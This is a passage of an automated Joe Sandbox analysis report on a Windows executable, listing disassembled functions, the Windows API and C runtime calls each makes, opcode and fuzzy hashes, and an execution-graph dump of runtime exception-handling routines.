                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                                      • String ID: $pA
                                      • API String ID: 790731606-4007739358
                                      • Opcode ID: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
                                      • Instruction ID: fee6f31afef46dfc3d4b18dc130868db542cea1a9d30875f0fa626089c73850b
                                      • Opcode Fuzzy Hash: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
                                      • Instruction Fuzzy Hash: E151F6B5904A007EE2007BF2DD82E3F266EDFD4719B10893FF844B9092C93C994DA66D
                                      Function 004024F1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
                                      • PathRemoveArgsW.SHLWAPI(?), ref: 004025D9
                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(008C8F58,008C8F58,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                        • Part of subcall function 0040DF50: HeapFree.KERNEL32(008C0000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                      • String ID: *pA
                                      • API String ID: 1199808876-3833533140
                                      • Opcode ID: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
                                      • Instruction ID: 21a80edfc212e2aa9d277187ee9bfa0e7f9d15baa35618845dd156f20ee28a4c
                                      • Opcode Fuzzy Hash: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
                                      • Instruction Fuzzy Hash: 6C412DB5904701AED600BBB2DD8293F77ADEBD4309F108D3FF544A9092CA3CD849966E
                                      Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
                                        • Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
                                        • Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319
                                      • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Value$AllocCommandHeapLine
                                      • String ID: $"
                                      • API String ID: 1339485270-3817095088
                                      • Opcode ID: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                      • Instruction ID: ab659b79707db7d7869a667e669445cd4c695224699636d93eb587c6e0e94742
                                      • Opcode Fuzzy Hash: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                      • Instruction Fuzzy Hash: 4A31A7735252218ADB74AF10981127772A1EFA2B60F18C17FE4926B3D2F37D8D41D369
                                      Function 00409FB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcscmp
                                      • String ID: $0A
                                      • API String ID: 3419221977-513306843
                                      • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                      • Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
                                      • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                      • Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A
                                      Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide
                                      • String ID: $0A
                                      • API String ID: 626452242-513306843
                                      • Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                      • Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
                                      • Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                      • Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC
                                      Function 0040D57F Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
                                      • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
                                      • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 830345296-0
                                      • Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                      • Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
                                      • Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                      • Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94
                                      Function 0040E130 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wcslen.MSVCRT ref: 0040E145
                                      • HeapAlloc.KERNEL32(008C0000,00000000,0000000A), ref: 0040E169
                                      • HeapReAlloc.KERNEL32(008C0000,00000000,00000000,0000000A), ref: 0040E18D
                                      • HeapFree.KERNEL32(008C0000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Heap$Alloc$Freewcslen
                                      • String ID:
                                      • API String ID: 2479713791-0
                                      • Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                      • Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
                                      • Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                      • Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94
                                      Function 0040D498 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                      • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
                                      • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                        • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 830345296-0
                                      • Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                      • Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
                                      • Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                      • Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65
                                      Function 0040D6DD Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
                                      • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalFreeHeapSection$EnterLeave
                                      • String ID:
                                      • API String ID: 1298188129-0
                                      • Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                      • Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
                                      • Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                      • Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8
                                      Function 00409ECF Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182
                                        • Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                        • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                        • Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                      • HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                      • String ID:
                                      • API String ID: 4254243056-0
                                      • Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                      • Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
                                      • Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                      • Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

                                      Execution Graph

                                      Execution Coverage:4.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:6.7%
                                      Total number of Nodes:1362
                                      Total number of Limit Nodes:21
                                      execution_graph 10194 414645 10195 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10194->10195 10196 41465b 10195->10196 10202 414666 10196->10202 10203 416785 10196->10203 10199 4146b5 10212 41456e 10199->10212 10204 410540 __getptd 66 API calls 10203->10204 10205 416792 10204->10205 10206 4167d6 10205->10206 10207 4167f9 10205->10207 10210 41469e 10205->10210 10206->10210 10216 415c73 10206->10216 10207->10210 10226 4163f3 10207->10226 10210->10199 10211 4144b1 RtlUnwind 10210->10211 10211->10199 10213 414580 10212->10213 10214 414592 10212->10214 10213->10202 10215 410540 __getptd 66 API calls 10214->10215 10215->10213 10217 415c7f ___BuildCatchObjectHelper 10216->10217 10218 410540 __getptd 66 API calls 10217->10218 10224 415c9f __CallSettingFrame@12 10218->10224 10219 415d10 10271 415d35 10219->10271 10223 415d26 ___BuildCatchObjectHelper 10223->10210 10224->10219 10265 413477 10224->10265 10225 413477 ___BuildCatchObjectHelper 69 API calls 10225->10223 10227 416412 10226->10227 10228 413477 ___BuildCatchObjectHelper 69 API calls 10227->10228 10230 41642c 10227->10230 10228->10230 10229 41674d 10232 410540 __getptd 66 API calls 10229->10232 10236 410540 __getptd 66 API calls 10230->10236 10259 41650b FindHandler type_info::operator== ___TypeMatch 10230->10259 10231 416734 10365 4162ec 10231->10365 10235 416755 10232->10235 10233 41342b __CxxUnhandledExceptionFilter 68 API calls 10233->10259 10237 416763 10235->10237 10239 413477 ___BuildCatchObjectHelper 69 API calls 10235->10239 10238 416473 10236->10238 10237->10210 10238->10237 10241 410540 __getptd 66 API calls 10238->10241 10239->10237 10243 416485 10241->10243 10244 410540 __getptd 66 API calls 10243->10244 10247 416493 ___BuildCatchObjectHelper 10244->10247 10246 415e12 FindHandler 69 API calls 10246->10259 10249 413477 ___BuildCatchObjectHelper 69 API calls 10247->10249 10251 4164af 10247->10251 10248 4164d9 10250 410540 __getptd 66 API calls 10248->10250 10249->10251 10252 4164de 10250->10252 10251->10248 10255 413477 ___BuildCatchObjectHelper 69 API calls 10251->10255 10256 410540 __getptd 66 API calls 10252->10256 10252->10259 10254 410540 66 API calls __getptd 10254->10259 10255->10248 10257 4164f0 10256->10257 10258 410540 __getptd 66 API calls 10257->10258 10260 4164fb 10258->10260 10259->10229 10259->10231 10259->10233 10259->10246 10259->10254 10263 415c73 ___FrameUnwindToState 69 API calls 10259->10263 10328 40e7a0 10259->10328 10331 411119 10259->10331 10334 4146e4 10259->10334 10340 41627e 10259->10340 10350 4144b1 RtlUnwind 10259->10350 10351 415e88 10259->10351 10322 415e12 10260->10322 10263->10259 10276 412140 10265->10276 10267 413483 DecodePointer 10268 413493 10267->10268 10277 41342b 10268->10277 10270 4134ae 10272 410540 __getptd 66 API calls 10271->10272 10273 415d3a 10272->10273 10274 415d1c 10273->10274 10275 410540 __getptd 66 API calls 10273->10275 10274->10223 10274->10225 10275->10274 10276->10267 10278 413437 ___BuildCatchObjectHelper 10277->10278 10279 410540 __getptd 66 API calls 10278->10279 10280 41343c 10279->10280 10283 413fa7 10280->10283 10282 41345e ___BuildCatchObjectHelper 10282->10270 10294 413515 DecodePointer 10283->10294 10285 413fac 10289 413fb7 10285->10289 10295 413522 10285->10295 10287 413fcf 10288 4116b5 _abort 66 API calls 10287->10288 10291 413fd9 10288->10291 10289->10287 10290 410954 __call_reportfault 8 API calls 10289->10290 10290->10287 10292 4116e9 __amsg_exit 66 API calls 10291->10292 10293 413fe1 10292->10293 10293->10282 10294->10285 10298 41352e ___BuildCatchObjectHelper 10295->10298 10296 413589 10297 41356b DecodePointer 10296->10297 10302 413598 10296->10302 10303 41355a _siglookup 10297->10303 10298->10296 10298->10297 10299 413555 10298->10299 10305 413551 10298->10305 10301 4104c7 __getptd_noexit 66 API calls 10299->10301 10301->10303 10304 410b21 __wcsicmp_l 66 API calls 10302->10304 10306 4135f5 10303->10306 10307 413563 ___BuildCatchObjectHelper 10303->10307 10309 4116b5 _abort 66 API calls 10303->10309 10308 41359d 10304->10308 10305->10299 10305->10302 10311 4126fb __lock 66 API calls 10306->10311 10312 413600 10306->10312 10307->10289 10310 410acf __wcsicmp_l 11 API calls 10308->10310 10309->10306 10310->10307 10311->10312 10314 413635 10312->10314 10316 410390 EncodePointer 10312->10316 10317 413689 10314->10317 10316->10314 10318 41368f 10317->10318 10320 413696 10317->10320 10321 412622 LeaveCriticalSection 10318->10321 10320->10307 10321->10320 10323 415e20 10322->10323 10327 415e2a ___TypeMatch 10322->10327 10324 413477 ___BuildCatchObjectHelper 69 API calls 10323->10324 10325 415e25 10324->10325 10326 41342b __CxxUnhandledExceptionFilter 68 API calls 10325->10326 10326->10327 10327->10259 10381 40e742 10328->10381 10332 411142 10331->10332 10333 41114e RaiseException 10331->10333 10332->10333 10333->10259 10336 4146fd 10334->10336 10335 414731 10337 41474a 10335->10337 10338 413477 ___BuildCatchObjectHelper 69 API calls 10335->10338 10336->10335 10339 413477 ___BuildCatchObjectHelper 69 API calls 10336->10339 10337->10259 10338->10337 10339->10336 10341 416289 10340->10341 10343 416296 10340->10343 10387 4161ec 10341->10387 10391 4144b1 RtlUnwind 10343->10391 10345 4162ad 10346 415c73 ___FrameUnwindToState 69 API calls 10345->10346 10347 4162bb 10346->10347 10392 415ed1 10347->10392 10349 4162dc FindHandlerForForeignException 10349->10259 10350->10259 10352 415e94 __EH_prolog3_catch 10351->10352 10353 410540 __getptd 66 API calls 10352->10353 10354 415e99 10353->10354 10355 415ea7 10354->10355 10356 413477 ___BuildCatchObjectHelper 69 API calls 10354->10356 10435 413464 10355->10435 10356->10355 10366 4163ee 10365->10366 10367 416304 10365->10367 10366->10229 10368 410540 __getptd 66 API calls 10367->10368 10369 41630a 10368->10369 10370 41634f 10369->10370 10371 410540 __getptd 66 API calls 10369->10371 10370->10366 10372 416368 10370->10372 10374 413477 ___BuildCatchObjectHelper 69 API calls 10370->10374 10373 416318 10371->10373 10375 4146e4 _GetRangeOfTrysToCheck 69 API calls 10372->10375 10438 410390 EncodePointer 10373->10438 10374->10372 10379 41637d 10375->10379 10377 416323 10377->10370 10378 41456e _CallSETranslator 66 API calls 10377->10378 10378->10370 10379->10366 10380 41627e FindHandlerForForeignException 70 API calls 10379->10380 10380->10379 10382 40e750 _strlen 10381->10382 10383 40e775 10381->10383 10384 410b93 _malloc 66 API calls 10382->10384 10383->10259 10385 40e762 10384->10385 10385->10383 10386 410b34 _strcpy_s 66 API calls 10385->10386 10386->10383 10388 4161f8 ___BuildCatchObjectHelper 10387->10388 10406 41606d 10388->10406 10390 416227 ___BuildCatchObject ___BuildCatchObjectHelper 10390->10343 10391->10345 10393 415edd ___BuildCatchObjectHelper 10392->10393 10410 414757 10393->10410 10396 410540 __getptd 66 API calls 10397 415f08 10396->10397 10398 410540 __getptd 66 API calls 10397->10398 10399 415f16 10398->10399 10400 410540 __getptd 66 API calls 10399->10400 10401 415f24 10400->10401 10402 410540 __getptd 66 API calls 10401->10402 10403 415f2f _CallCatchBlock2 10402->10403 10415 415ff7 10403->10415 10405 415fe3 ___BuildCatchObjectHelper 10405->10349 10408 416079 ___BuildCatchObjectHelper 10406->10408 10407 413477 ___BuildCatchObjectHelper 69 API calls 10409 4160e6 _memmove ___BuildCatchObjectHelper 10407->10409 10408->10407 10408->10409 10409->10390 10411 410540 __getptd 66 API calls 10410->10411 10412 41476a 10411->10412 10413 410540 __getptd 66 API calls 10412->10413 10414 414778 10413->10414 10414->10396 10424 4147aa 10415->10424 10418 410540 __getptd 66 API calls 10419 41600b 10418->10419 10420 410540 __getptd 66 API calls 10419->10420 10422 416019 10420->10422 10421 41605c FindHandler 10421->10405 10422->10421 10432 414783 10422->10432 10425 410540 __getptd 66 API calls 10424->10425 10426 4147b5 10425->10426 10427 4147d1 10426->10427 10428 4147c0 10426->10428 10430 410540 __getptd 66 API calls 10427->10430 10429 410540 __getptd 66 API calls 10428->10429 10431 4147c5 10429->10431 10430->10431 10431->10418 10433 410540 __getptd 66 API calls 10432->10433 10434 41478d 10433->10434 10434->10421 10436 410540 __getptd 66 API calls 10435->10436 10437 413469 10436->10437 10438->10377 11160 41055a 11161 410566 ___BuildCatchObjectHelper 11160->11161 11162 410cbb _free 66 API calls 11161->11162 11163 41057e 11161->11163 11193 410668 ___BuildCatchObjectHelper 11161->11193 11162->11163 11164 41058c 11163->11164 11165 410cbb _free 66 API calls 11163->11165 11166 41059a 11164->11166 11167 410cbb _free 66 API calls 11164->11167 11165->11164 11168 4105a8 11166->11168 11169 410cbb _free 66 API calls 11166->11169 11167->11166 11170 4105b6 11168->11170 11171 410cbb _free 66 API calls 11168->11171 11169->11168 11172 4105c4 11170->11172 11173 410cbb _free 66 API calls 11170->11173 11171->11170 11174 4105d2 11172->11174 11175 410cbb _free 66 API calls 11172->11175 11173->11172 11176 4105e3 11174->11176 11177 410cbb _free 66 API calls 11174->11177 11175->11174 11178 4126fb __lock 66 API calls 11176->11178 11177->11176 11179 4105eb 11178->11179 11180 410610 11179->11180 11181 4105f7 InterlockedDecrement 11179->11181 11196 410674 11180->11196 11181->11180 11182 410602 11181->11182 11182->11180 11185 410cbb _free 66 API calls 11182->11185 11185->11180 11186 4126fb __lock 